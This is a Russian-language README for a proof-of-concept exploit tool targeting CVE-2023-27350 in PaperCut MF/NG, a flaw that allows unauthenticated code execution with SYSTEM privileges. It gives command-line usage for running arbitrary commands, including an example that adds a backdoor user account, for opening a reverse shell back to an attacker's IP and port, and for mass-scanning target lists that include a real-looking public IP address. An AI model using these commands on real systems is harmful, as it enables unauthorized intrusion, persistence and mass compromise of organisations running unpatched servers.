
Эксплойт для Papercut CVE-2023-27350. [+] Обратная оболочка [+] Массовая проверка
Это эксплойт Proof of Concept (POC) для CVE-2023-27350, уязвимости, обнаруженной в PaperCut MF/NG, которая позволяет неавторизованному злоумышленнику выполнять произвольный код с привилегиями SYSTEM.
Перед использованием этого эксплойта убедитесь, что вы установили следующие библиотеки:
pip install -r requirements.txt
-u, --url: URL целевого приложения PaperCut MF/NG (например, http://target-ip:9191).-c, --command: Команда для выполнения на целевой системе.--reverse-shell: Использовать полезную нагрузку reverse shell для выполнения команд на целевой системе.-f, --file: Проверить несколько целей из файла (например, file.txt).Чтобы выполнить команду на целевой системе, используйте опцию -c:
python CVE-2023-27350.py -u http://target-ip:9191 -c "net user test test1234 /add"
Чтобы использовать полезную нагрузку reverse shell для выполнения команд на целевой системе, используйте опцию --reverse-shell. Вам будет предложено ввести ваш IP-адрес и номер порта:
python exploit.py -u http://target-ip:9191 --reverse-shell Enter your IP address: <attacker-ip> Enter your port number: <port>
Чтобы проверить несколько целей из файла, используйте опцию -f. Формат файла должен быть ip_address:port:
python CVE-2023-27350.py -f file.txt
file.txtПри использовании опции массовой проверки с входным файлом file.txt убедитесь, что содержимое файла отформатировано правильно.
Каждая строка файла должна содержать IP-адрес и номер порта цели, разделенные двоеточием :. Например:
110.175.19.78:9191 110.175.19.78:80 192.168.1.1:8080
Убедитесь, что между IP-адресом, двоеточием и номером порта нет лишних пробелов или символов. Также убедитесь, что каждая строка содержит только один IP-адрес и номер порта.
Это форкнутая версия репозитория horizon3ai/CVE-2023-27350. Все заслуги за оригинальный эксплойт принадлежат авторам.